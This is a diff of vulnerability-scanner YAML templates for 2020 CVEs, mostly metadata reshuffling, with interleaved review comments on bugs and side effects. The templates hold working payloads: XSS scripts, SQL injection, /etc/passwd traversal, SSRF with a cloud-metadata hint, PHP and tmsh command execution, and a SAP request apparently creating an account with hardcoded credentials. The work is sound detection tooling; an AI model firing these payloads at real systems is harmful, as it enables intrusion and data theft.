@@ -15,11 +15,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-5191 cwe-id: CWE-79 - cpe: cpe:2.3:a:phpgurukul:hospital_management_system_in_php:*:*:*:*:*:*:*:* - epss-score: 0.00311 + epss-score: 0.00383 + cpe: cpe:2.3:a:phpgurukul:hospital_management_system_in_php:4.0:*:*:*:*:*:*:* metadata: max-request: 2 verified: true + vendor: phpgurukul + product: hospital_management_system_in_php tags: cve2020,hms,cms,xss,authenticated,edb,cve http: @@ -30,7 +32,6 @@ http: Content-Type: application/x-www-form-urlencoded username={{username}}&password={{password}}&submit=&submit= - - | POST /hospital/hms/admin/doctor-specilization.php HTTP/1.1 Host: {{Hostname}} @@ -38,9 +39,10 @@ http: doctorspecilization=%3C%2Ftd%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3Ctd%3E&submit= + cookie-reuse: true host-redirects: true max-redirects: 2 - cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2020/CVE-2020-5192.yaml b/http/cves/2020/CVE-2020-5192.yaml index 078cb4f305..ea58fdeb3d 100644 --- a/http/cves/2020/CVE-2020-5192.yaml +++ b/http/cves/2020/CVE-2020-5192.yaml @@ -15,13 +15,14 @@ info: cvss-score: 8.8 cve-id: CVE-2020-5192 cwe-id: CWE-89 - cpe: cpe:2.3:a:phpgurukul:hospital_management_system_in_php:*:*:*:*:*:*:*:* - epss-score: 0.00529 + epss-score: 0.01145 + cpe: cpe:2.3:a:phpgurukul:hospital_management_system_in_php:4.0:*:*:*:*:*:*:* metadata: max-request: 2 verified: true + vendor: phpgurukul + product: hospital_management_system_in_php tags: cve2020,hms,cms,sqli,authenticated,edb,cve - variables: num: "999999999" @@ -33,7 +34,6 @@ http: Content-Type: application/x-www-form-urlencoded username={{username}}password={{password}}&submit=&submit= - - | POST /hospital/hms/doctor/search.php HTTP/1.1 Host: {{Hostname}} 
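Review bot: The login body in the CVE-2020-5192 hunk, `username={{username}}password={{password}}&submit=&submit=`, has no `&` between the username and password fields, so the server receives a single `username` parameter and the session that the second request depends on via `cookie-reuse` is never established. The CVE-2020-5191 template earlier in this diff sends the same form as `username={{username}}&password={{password}}&submit=&submit=`, which is the line this one should match. The line is context here rather than part of the commit's change, and the raw request it belongs to continues outside the hunk.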
@@ -41,9 +41,10 @@ http: searchdata='+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT(md5({{num}}),1),2),NULL--+PqeG&search= + cookie-reuse: true host-redirects: true max-redirects: 2 - cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2020/CVE-2020-5284.yaml b/http/cves/2020/CVE-2020-5284.yaml index 5bc9d624e6..2009e4c55f 100644 --- a/http/cves/2020/CVE-2020-5284.yaml +++ b/http/cves/2020/CVE-2020-5284.yaml @@ -14,27 +14,32 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N cvss-score: 4.3 cve-id: CVE-2020-5284 - cwe-id: CWE-22 + cwe-id: CWE-22,CWE-23 + epss-score: 0.00104 cpe: cpe:2.3:a:zeit:next.js:*:*:*:*:*:*:*:* - epss-score: 0.00122 - tags: cve,cve2020,nextjs,lfi metadata: max-request: 1 + vendor: zeit + product: next.js + tags: cve,cve2020,nextjs,lfi http: - method: GET path: - "{{BaseURL}}/_next/static/../server/pages-manifest.json" + matchers-condition: and matchers: - - type: regex - regex: - - '\{"/_app":".*?_app\.js"' - part: body - type: word + part: header words: - "application/json" - part: header + + - type: regex + part: body + regex: + - '\{"/_app":".*?_app\.js"' + - type: status status: - 200 diff --git a/http/cves/2020/CVE-2020-5307.yaml b/http/cves/2020/CVE-2020-5307.yaml index bc26642036..e144e45f6a 100644 --- a/http/cves/2020/CVE-2020-5307.yaml +++ b/http/cves/2020/CVE-2020-5307.yaml 
@@ -15,11 +15,13 @@ info: cvss-score: 9.8 cve-id: CVE-2020-5307 cwe-id: CWE-89 - cpe: cpe:2.3:a:phpgurukul_dairy_farm_shop_management_system_project:phpgurukul_dairy_farm_shop_management_system:*:*:*:*:*:*:*:* - epss-score: 0.01029 - tags: sqli,edb,cve,cve2020 + epss-score: 0.01326 + cpe: cpe:2.3:a:phpgurukul_dairy_farm_shop_management_system_project:phpgurukul_dairy_farm_shop_management_system:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: phpgurukul_dairy_farm_shop_management_system_project + product: phpgurukul_dairy_farm_shop_management_system + tags: sqli,edb,cve,cve2020 http: - raw: diff --git a/http/cves/2020/CVE-2020-5405.yaml b/http/cves/2020/CVE-2020-5405.yaml index 9c3cb93388..f8740c8425 100644 --- a/http/cves/2020/CVE-2020-5405.yaml +++ b/http/cves/2020/CVE-2020-5405.yaml @@ -12,23 +12,27 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N cvss-score: 6.5 cve-id: CVE-2020-5405 - cwe-id: CWE-22 - cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:* + cwe-id: CWE-22,CWE-23 epss-score: 0.00258 - tags: cve,cve2020,lfi,springcloud + cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: vmware + product: spring_cloud_config + tags: cve,cve2020,lfi,springcloud http: - method: GET path: - '{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd' + matchers-condition: and matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + - type: status status: - 200 - - type: regex - regex: - - "root:.*:0:0:" - part: body diff --git a/http/cves/2020/CVE-2020-5410.yaml b/http/cves/2020/CVE-2020-5410.yaml index b7a8eb0d4e..b5485609cd 100644 --- a/http/cves/2020/CVE-2020-5410.yaml +++ b/http/cves/2020/CVE-2020-5410.yaml 
@@ -12,12 +12,14 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-5410 - cwe-id: CWE-22 + cwe-id: CWE-22,CWE-23 + epss-score: 0.97314 cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:* - epss-score: 0.9712 - tags: cve,cve2020,lfi,springcloud,config,traversal,kev metadata: max-request: 1 + vendor: vmware + product: spring_cloud_config + tags: cve,cve2020,lfi,springcloud,config,traversal,kev http: - method: GET @@ -26,7 +28,6 @@ http: matchers-condition: and matchers: - - type: regex part: body regex: diff --git a/http/cves/2020/CVE-2020-5412.yaml b/http/cves/2020/CVE-2020-5412.yaml index 222d13f7a8..3d935f48a9 100644 --- a/http/cves/2020/CVE-2020-5412.yaml +++ b/http/cves/2020/CVE-2020-5412.yaml @@ -12,20 +12,20 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2020-5412 - cwe-id: CWE-610 + cwe-id: CWE-441,CWE-610 + epss-score: 0.04459 cpe: cpe:2.3:a:vmware:spring_cloud_netflix:*:*:*:*:*:*:*:* - epss-score: 0.03435 - tags: cve,cve2020,ssrf,springcloud metadata: max-request: 1 + vendor: vmware + product: spring_cloud_netflix + tags: cve,cve2020,ssrf,springcloud http: - method: GET path: - "{{BaseURL}}/proxy.stream?origin=http://{{interactsh-url}}" - # To get crithit, try http://169.254.169.254/latest/metadata/ - matchers-condition: and matchers: - type: word @@ -41,3 +41,5 @@ http: - type: status status: - 200 + +# To get crithit, try http://169.254.169.254/latest/metadata/ diff --git a/http/cves/2020/CVE-2020-5775.yaml b/http/cves/2020/CVE-2020-5775.yaml index 338402e613..40e60befbf 100644 --- a/http/cves/2020/CVE-2020-5775.yaml +++ b/http/cves/2020/CVE-2020-5775.yaml 
@@ -13,11 +13,13 @@ info: cvss-score: 5.8 cve-id: CVE-2020-5775 cwe-id: CWE-918 - cpe: cpe:2.3:a:instructure:canvas_learning_management_service:*:*:*:*:*:*:*:* - epss-score: 0.00166 - tags: cve,cve2020,ssrf,oast,blind,tenable + epss-score: 0.00189 + cpe: cpe:2.3:a:instructure:canvas_learning_management_service:2020-07-29:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: instructure + product: canvas_learning_management_service + tags: cve,cve2020,ssrf,oast,blind,tenable http: - method: GET diff --git a/http/cves/2020/CVE-2020-5776.yaml b/http/cves/2020/CVE-2020-5776.yaml index e8f176c1a4..9adacd41fb 100644 --- a/http/cves/2020/CVE-2020-5776.yaml +++ b/http/cves/2020/CVE-2020-5776.yaml @@ -13,11 +13,13 @@ info: cvss-score: 8.8 cve-id: CVE-2020-5776 cwe-id: CWE-352 + epss-score: 0.52762 cpe: cpe:2.3:a:magmi_project:magmi:*:*:*:*:*:*:*:* - epss-score: 0.53263 metadata: max-request: 3 shodan-query: http.component:"Magento" + vendor: magmi_project + product: magmi tags: magmi,magento,tenable,cve,cve2020 http: @@ -40,6 +42,7 @@ http: GET /magmi/web/info.php HTTP/1.1 Host: {{Hostname}} Connection: close + matchers-condition: and matchers: - type: word @@ -47,6 +50,7 @@ http: - "PHP Extension" - "PHP Version" condition: and + - type: status status: - 200 diff --git a/http/cves/2020/CVE-2020-5777.yaml b/http/cves/2020/CVE-2020-5777.yaml index 002131b07a..64401c02cf 100644 --- a/http/cves/2020/CVE-2020-5777.yaml +++ b/http/cves/2020/CVE-2020-5777.yaml @@ -14,11 +14,13 @@ info: cvss-score: 9.8 cve-id: CVE-2020-5777 cwe-id: CWE-287 + epss-score: 0.02505 cpe: cpe:2.3:a:magmi_project:magmi:*:*:*:*:*:*:*:* - epss-score: 0.01568 metadata: max-request: 1 shodan-query: http.component:"Magento" + vendor: magmi_project + product: magmi tags: plugin,tenable,cve,cve2020,magmi,magento,auth,bypass http: @@ -31,9 +33,10 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "Too many connections" - part: body + - type: status status: - 503 
diff --git a/http/cves/2020/CVE-2020-5847.yaml b/http/cves/2020/CVE-2020-5847.yaml index 16e1094f0a..4c5484e9c1 100644 --- a/http/cves/2020/CVE-2020-5847.yaml +++ b/http/cves/2020/CVE-2020-5847.yaml @@ -15,21 +15,25 @@ info: cvss-score: 9.8 cve-id: CVE-2020-5847 cwe-id: CWE-94,CWE-668 + epss-score: 0.97138 cpe: cpe:2.3:a:unraid:unraid:*:*:*:*:*:*:*:* - epss-score: 0.97272 metadata: max-request: 1 + vendor: unraid + product: unraid tags: cve,cve2020,rce,kev http: - method: GET path: - "{{BaseURL}}/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20echo%20md5(%22CVE-2020-5847%22);%20?%3E" + matchers-condition: and matchers: - - type: status - status: - - 200 - type: word words: - "b13928fbcfff659363d7c7d1ec008d56" + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-5902.yaml b/http/cves/2020/CVE-2020-5902.yaml index 10130c103d..40d633ad19 100644 --- a/http/cves/2020/CVE-2020-5902.yaml +++ b/http/cves/2020/CVE-2020-5902.yaml @@ -22,11 +22,14 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-5902 - cwe-id: CWE-22,CWE-829 - epss-score: 0.97562 - tags: cve2020,bigip,rce,kev,packetstorm,cve + cwe-id: CWE-22 + epss-score: 0.97566 + cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* metadata: max-request: 8 + vendor: f5 + product: big-ip_access_policy_manager + tags: cve2020,bigip,rce,kev,packetstorm,cve http: - method: GET @@ -38,10 +41,6 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: regex regex: - "root:.*:0:0:" @@ -50,6 +49,10 @@ http: - "HSQL Database Engine Servlet" condition: or + - type: status + status: + - 200 + - raw: - | POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 @@ -74,10 +77,10 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word words: - "h3ll0_w0Rld" + + - type: status + status: + - 200 
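Review bot: The new `cpe:`/`product:` entries in the CVE-2020-5902.yaml info hunk pin the template to `big-ip_access_policy_manager`, yet the requests target `/tmui/` (the TMUI configuration utility, which is shared by every BIG-IP module), so the metadata under-states the affected surface; NVD appears to list several BIG-IP module CPEs for this CVE, which is worth checking before settling on APM alone. If a single CPE is required by the schema, a more generic BIG-IP product would represent the template's actual scope better, or the narrowing should at least be explained in `description`. The `cwe-id` change from `CWE-22,CWE-829` to `CWE-22` is fine for the traversal request, but note that the second request (`tmshCmd.jsp`, matched on `h3ll0_w0Rld`) executes a tmsh command on a KEV-listed appliance — a one-line comment above that `raw:` entry saying so would help operators decide whether to run it.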
diff --git a/http/cves/2020/CVE-2020-6171.yaml b/http/cves/2020/CVE-2020-6171.yaml index 616591780e..80422868f3 100644 --- a/http/cves/2020/CVE-2020-6171.yaml +++ b/http/cves/2020/CVE-2020-6171.yaml @@ -14,11 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-6171 cwe-id: CWE-79 - cpe: cpe:2.3:a:communilink:clink_office:*:*:*:*:*:*:*:* epss-score: 0.00135 - tags: cve,cve2020,xss,clink-office + cpe: cpe:2.3:a:communilink:clink_office:2.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: communilink + product: clink_office + tags: cve,cve2020,xss,clink-office http: - method: GET @@ -28,15 +30,15 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '">' - part: body - - - type: status - status: - - 200 - type: word part: header words: - text/html + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-6207.yaml b/http/cves/2020/CVE-2020-6207.yaml index 44cf9d52a4..ec8b9bd9b9 100644 --- a/http/cves/2020/CVE-2020-6207.yaml +++ b/http/cves/2020/CVE-2020-6207.yaml @@ -18,11 +18,13 @@ info: cvss-score: 9.8 cve-id: CVE-2020-6207 cwe-id: CWE-306 - cpe: cpe:2.3:a:sap:solution_manager:*:*:*:*:*:*:*:* epss-score: 0.97442 - tags: cve,cve2020,sap,solman,rce,kev + cpe: cpe:2.3:a:sap:solution_manager:7.20:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: sap + product: solution_manager + tags: cve,cve2020,sap,solman,rce,kev http: - raw: @@ -38,20 +40,20 @@ http: matchers-condition: and matchers: - type: word + part: body words: - ":Envelope" - ":Body" - ":getAllAgentInfoResponse" - part: body + condition: and + + - type: word + part: header + words: + - "text/xml" + - "SAP NetWeaver Application Server" condition: and - type: status status: - 200 - - - type: word - words: - - "text/xml" - - "SAP NetWeaver Application Server" - part: header - condition: and diff --git a/http/cves/2020/CVE-2020-6287.yaml b/http/cves/2020/CVE-2020-6287.yaml index a0ae249102..e7bfabaf49 100644 --- a/http/cves/2020/CVE-2020-6287.yaml 
+++ b/http/cves/2020/CVE-2020-6287.yaml @@ -16,12 +16,14 @@ info: cvss-score: 10 cve-id: CVE-2020-6287 cwe-id: CWE-306 - cpe: cpe:2.3:a:sap:netweaver_application_server_java:*:*:*:*:*:*:*:* - epss-score: 0.97362 + epss-score: 0.97519 + cpe: cpe:2.3:a:sap:netweaver_application_server_java:7.30:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.favicon.hash:-266008933 - tags: cve,cve2020,sap,kev,cisa + vendor: sap + product: netweaver_application_server_java + tags: cve,cve2020,sap,kev http: - raw: @@ -35,24 +37,24 @@ http: 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 userDetails - # userName - sapRpoc6351 - # password - Secure!PwD8890 - matchers-condition: and matchers: - type: word + part: body words: - "CTCWebServiceSi" - "SOAP-ENV" - part: body condition: and + - type: word + part: header + words: + - "text/xml" + - "SAP NetWeaver Application Server" + - type: status status: - 200 - - type: word - words: - - "text/xml" - - "SAP NetWeaver Application Server" - part: header +# userName - sapRpoc6351 +# password - Secure!PwD8890 diff --git a/http/cves/2020/CVE-2020-6308.yaml b/http/cves/2020/CVE-2020-6308.yaml index 4fe490b727..db1121709f 100644 --- a/http/cves/2020/CVE-2020-6308.yaml +++ b/http/cves/2020/CVE-2020-6308.yaml @@ -16,11 +16,13 @@ info: cvss-score: 5.3 cve-id: CVE-2020-6308 cwe-id: CWE-918 - cpe: cpe:2.3:a:sap:businessobjects_business_intelligence_platform:*:*:*:*:*:*:*:* - epss-score: 0.00264 - tags: cve,cve2020,sap,ssrf,oast,unauth + epss-score: 0.00306 + cpe: cpe:2.3:a:sap:businessobjects_business_intelligence_platform:4.1:-:*:*:*:*:*:* metadata: max-request: 1 + vendor: sap + product: businessobjects_business_intelligence_platform + tags: cve,cve2020,sap,ssrf,oast,unauth http: - raw: diff --git a/http/cves/2020/CVE-2020-6637.yaml b/http/cves/2020/CVE-2020-6637.yaml index 0ebb51c668..76bac71852 100644 --- a/http/cves/2020/CVE-2020-6637.yaml +++ b/http/cves/2020/CVE-2020-6637.yaml 
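Review bot: The `# userName - sapRpoc6351` / `# password - Secure!PwD8890` lines moved to the tail of CVE-2020-6287.yaml read like the credentials of an account the CTCWebService POST creates on the target (the request body itself is elided in this diff, so please confirm); if that is what the request does, every scan leaves a persistent privileged user with a publicly known password on each vulnerable NetWeaver host, and that side effect deserves a prominent note beside the request rather than a detached trailing comment, e.g. `# NOTE: this request creates user sapRpoc6351 (password Secure!PwD8890) on the target; remove it after testing`. Consider also surfacing it in `info.description` or `remediation` so it appears in scan output. Separately, the re-added header matcher lists `"text/xml"` and `"SAP NetWeaver Application Server"` with no `condition:`, and nuclei's default for `words` is `or`, so either value alone satisfies it; the sibling body matcher uses `condition: and`, and if both header tokens were meant to be required add `condition: and` there too.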
@@ -10,16 +10,19 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2020-6637 - https://sourceforge.net/projects/opensis-ce/files/ - https://github.com/OS4ED/openSIS-Responsive-Design/commit/1127ae0bb7c3a2883febeabc6b71ad8d73510de8 + - https://opensis.com/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-6637 cwe-id: CWE-89 - cpe: cpe:2.3:a:os4ed:opensis:*:*:*:*:*:*:*:* - epss-score: 0.02214 + epss-score: 0.01772 + cpe: cpe:2.3:a:os4ed:opensis:7.3:*:*:*:community:*:*:* metadata: max-request: 3 shodan-query: http.title:"openSIS" + vendor: os4ed + product: opensis tags: cve,cve2020,sqli,opensis http: @@ -28,11 +31,13 @@ http: - '{{BaseURL}}/account/index.php' - '{{BaseURL}}/opensis/index.php' - '{{BaseURL}}/index.php' - headers: - Content-Type: application/x-www-form-urlencoded + body: | USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log= + headers: + Content-Type: application/x-www-form-urlencoded + matchers-condition: and matchers: - type: word @@ -41,6 +46,7 @@ http: - 'SQL STATEMENT:' - "UPDATE login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 WHERE UPPER(USERNAME)=UPPER(NULL)or`1`=`1`;-- -')" condition: and + - type: word part: header words: diff --git a/http/cves/2020/CVE-2020-7107.yaml b/http/cves/2020/CVE-2020-7107.yaml index a7ce121c6d..4b3c649122 100644 --- a/http/cves/2020/CVE-2020-7107.yaml +++ b/http/cves/2020/CVE-2020-7107.yaml 
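Review bot: The login payload on the relocated `body:` line of CVE-2020-6637.yaml (`USERNAME=%27%29or%601%60%3D%601%60%3B--+-`) ends up inside `UPDATE login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 WHERE ... or`1`=`1``, as the matcher string in the following hunk shows; if that statement executes rather than only being echoed on the error page, every account's failed-login counter is bumped on each scan, which on installs with a lockout threshold can lock out all users. That is worth stating in the template, e.g. a comment above `body:` such as `# NOTE: the injected OR 1=1 lands in an UPDATE on login_authentication; every account's FAILED_LOGIN may be incremented`, and, if this repo's `intrusive` tagging convention applies, tagging it accordingly. Minor: `body: |` keeps a trailing newline, which becomes the value of the final `log=` parameter; `body: |-` sends exactly the intended form string.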
@@ -11,17 +11,21 @@ info: - https://wordpress.org/plugins/ultimate-faqs/ - https://plugins.trac.wordpress.org/changeset/2222959/ultimate-faqs/tags/1.8.30/Shortcodes/DisplayFAQs.php - https://nvd.nist.gov/vuln/detail/CVE-2020-7107 + - https://wordpress.org/plugins/ultimate-faqs/#developers remediation: Fixed in version 1.8.30. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-7107 cwe-id: CWE-79 - cpe: cpe:2.3:a:etoilewebdesign:ultimate_faq:*:*:*:*:*:*:*:* epss-score: 0.00517 + cpe: cpe:2.3:a:etoilewebdesign:ultimate_faq:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 verified: true + framework: wordpress + vendor: etoilewebdesign + product: ultimate_faq tags: ultimate-faqs,wpscan,cve,cve2020,xss,wordpress,wp-plugin,wp http: diff --git a/http/cves/2020/CVE-2020-7136.yaml b/http/cves/2020/CVE-2020-7136.yaml index 9c0ef9ef18..6ba9dd0441 100644 --- a/http/cves/2020/CVE-2020-7136.yaml +++ b/http/cves/2020/CVE-2020-7136.yaml @@ -16,11 +16,13 @@ info: cvss-score: 9.8 cve-id: CVE-2020-7136 cwe-id: CWE-288 + epss-score: 0.05173 cpe: cpe:2.3:a:hpe:smart_update_manager:*:*:*:*:*:*:*:* - epss-score: 0.04874 - tags: cve,cve2020,hp,auth-bypass,hpe,tenable metadata: max-request: 2 + vendor: hpe + product: smart_update_manager + tags: cve,cve2020,hp,auth-bypass,hpe,tenable http: - raw: @@ -31,7 +33,6 @@ http: Content-Type: application/json {"hapi":{"username":"Administrator","password":"any_password","language":"en","mode":"gui", "usesshkey":true, "privatekey":"any_privateky", "passphrase":"any_passphase","settings":{"output_filter":"passed","port_number":"444"}}} - - | GET /session/{{sessionid}}/node/index HTTP/1.1 Host: {{Hostname}} @@ -49,7 +50,7 @@ http: - type: regex name: sessionid group: 1 - internal: true - part: body regex: - '"sessionId":"([a-z0-9.]+)"' + internal: true + part: body diff --git a/http/cves/2020/CVE-2020-7209.yaml b/http/cves/2020/CVE-2020-7209.yaml index 0a8a038353..ffe2093953 100644 
--- a/http/cves/2020/CVE-2020-7209.yaml +++ b/http/cves/2020/CVE-2020-7209.yaml @@ -17,11 +17,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-7209 + epss-score: 0.97134 cpe: cpe:2.3:a:hp:linuxki:*:*:*:*:*:*:*:* - epss-score: 0.97348 - tags: cve,cve2020,rce,packetstorm metadata: max-request: 1 + vendor: hp + product: linuxki + tags: cve,cve2020,rce,packetstorm http: - method: GET @@ -31,6 +33,6 @@ http: matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body diff --git a/http/cves/2020/CVE-2020-7318.yaml b/http/cves/2020/CVE-2020-7318.yaml index 1e21e7b18b..caf9611350 100644 --- a/http/cves/2020/CVE-2020-7318.yaml +++ b/http/cves/2020/CVE-2020-7318.yaml @@ -17,11 +17,13 @@ info: cvss-score: 4.3 cve-id: CVE-2020-7318 cwe-id: CWE-79 - cpe: cpe:2.3:a:mcafee:epolicy_orchestrator:*:*:*:*:*:*:*:* epss-score: 0.00051 - tags: cve,cve2020,xss,mcafee + cpe: cpe:2.3:a:mcafee:epolicy_orchestrator:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: mcafee + product: epolicy_orchestrator + tags: cve,cve2020,xss,mcafee http: - raw: @@ -32,16 +34,18 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - type: word + part: header words: - "text/html" - part: header + - type: word + part: body words: - "Policy Name" - "'\">" condition: and - part: body + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-7796.yaml b/http/cves/2020/CVE-2020-7796.yaml index 5f945d5139..a6e7b26f7f 100644 --- a/http/cves/2020/CVE-2020-7796.yaml +++ b/http/cves/2020/CVE-2020-7796.yaml @@ -14,11 +14,13 @@ info: cvss-score: 9.8 cve-id: CVE-2020-7796 cwe-id: CWE-918 + epss-score: 0.74825 cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* - epss-score: 0.70272 - tags: cve,cve2020,zimbra,ssrf,oast metadata: max-request: 1 + vendor: synacor + product: zimbra_collaboration_suite + tags: cve,cve2020,zimbra,ssrf,oast http: - raw: 
diff --git a/http/cves/2020/CVE-2020-7943.yaml b/http/cves/2020/CVE-2020-7943.yaml index a70d88ea94..08e90624ea 100644 --- a/http/cves/2020/CVE-2020-7943.yaml +++ b/http/cves/2020/CVE-2020-7943.yaml @@ -15,10 +15,13 @@ info: cvss-score: 7.5 cve-id: CVE-2020-7943 cwe-id: CWE-276 - epss-score: 0.02202 - tags: cve,cve2020,puppet,exposure,puppetdb + epss-score: 0.05993 + cpe: cpe:2.3:a:puppet:puppet_enterprise:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: puppet + product: puppet_enterprise + tags: cve,cve2020,puppet,exposure,puppetdb http: - method: GET @@ -27,7 +30,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/cves/2020/CVE-2020-7961.yaml b/http/cves/2020/CVE-2020-7961.yaml index 2356e5797c..7ab804a96c 100644 --- a/http/cves/2020/CVE-2020-7961.yaml +++ b/http/cves/2020/CVE-2020-7961.yaml @@ -10,16 +10,19 @@ info: - https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html - https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271 - https://nvd.nist.gov/vuln/detail/CVE-2020-7961 + - http://packetstormsecurity.com/files/157254/Liferay-Portal-Java-Unmarshalling-Remote-Code-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-7961 cwe-id: CWE-502 - cpe: cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:* - epss-score: 0.97464 - tags: cve,cve2020,rce,liferay,kev + epss-score: 0.97475 + cpe: cpe:2.3:a:liferay:liferay_portal:*:*:*:*:community:*:*:* metadata: max-request: 2 + vendor: liferay + product: liferay_portal + tags: packetstorm,cve,cve2020,rce,liferay,kev http: - raw: 
@@ -34,17 +37,16 @@ http: payloads: command: - - "systeminfo" # Windows - - "lsb_release -a" # Linux + - "systeminfo" # Windows + - "lsb_release -a" # Linux matchers-condition: and matchers: - - type: regex - condition: or regex: - "OS Name:.*Microsoft Windows" - "Distributor ID:" + condition: or - type: status status: @@ -52,7 +54,7 @@ http: extractors: - type: regex - part: body regex: - "Microsoft Windows (.*)" - "Distributor ID: (.*)" + part: body diff --git a/http/cves/2020/CVE-2020-7980.yaml b/http/cves/2020/CVE-2020-7980.yaml index 3ddc606ab1..9fe5b2640c 100644 --- a/http/cves/2020/CVE-2020-7980.yaml +++ b/http/cves/2020/CVE-2020-7980.yaml @@ -15,11 +15,13 @@ info: cvss-score: 9.8 cve-id: CVE-2020-7980 cwe-id: CWE-78 - cpe: cpe:2.3:a:intelliantech:aptus_web:*:*:*:*:*:*:*:* - epss-score: 0.972 + epss-score: 0.97201 + cpe: cpe:2.3:a:intelliantech:aptus_web:1.24:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"Intellian Aptus Web" + vendor: intelliantech + product: aptus_web tags: cve,cve2020,intellian,aptus,packetstorm,satellian,rce http: @@ -34,6 +36,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: regex diff --git a/http/cves/2020/CVE-2020-8115.yaml b/http/cves/2020/CVE-2020-8115.yaml index 11d4ddcefd..fdc4a90771 100644 --- a/http/cves/2020/CVE-2020-8115.yaml +++ b/http/cves/2020/CVE-2020-8115.yaml @@ -1,4 +1,5 @@ id: CVE-2020-8115 + info: name: Revive Adserver <=5.0.3 - Cross-Site Scripting author: madrobot,dwisiswant0 
@@ -15,21 +16,26 @@ info: cvss-score: 6.1 cve-id: CVE-2020-8115 cwe-id: CWE-79 + epss-score: 0.0187 cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:* - epss-score: 0.02261 - tags: cve,cve2020,xss,hackerone metadata: max-request: 1 + vendor: revive-adserver + product: revive_adserver + tags: cve,cve2020,xss,hackerone + http: - method: GET path: - "{{BaseURL}}/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\"" + matchers-condition: and matchers: - - type: status - status: - - 200 - type: regex part: body regex: - (?mi)window\.location\.replace\(".*alert\(1337\) + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-8163.yaml b/http/cves/2020/CVE-2020-8163.yaml index f0be714548..bcfcb49256 100644 --- a/http/cves/2020/CVE-2020-8163.yaml +++ b/http/cves/2020/CVE-2020-8163.yaml @@ -6,7 +6,6 @@ info: severity: high description: Ruby on Rails before version 5.0.1 is susceptible to remote code execution because it passes user parameters as local variables into partials. reference: - - https://web.archive.org/web/20201029105442/https://correkt.horse/ruby/2020/08/22/CVE-2020-8163/ - https://hackerone.com/reports/304805 - https://groups.google.com/g/rubyonrails-security/c/hWuKcHyoKh0 - https://lists.debian.org/debian-lts-announce/2020/07/msg00013.html @@ -16,10 +15,13 @@ info: cvss-score: 8.8 cve-id: CVE-2020-8163 cwe-id: CWE-94 - epss-score: 0.97359 - tags: cve,cve2020,rails,rce,hackerone + epss-score: 0.96961 + cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: rubyonrails + product: rails + tags: 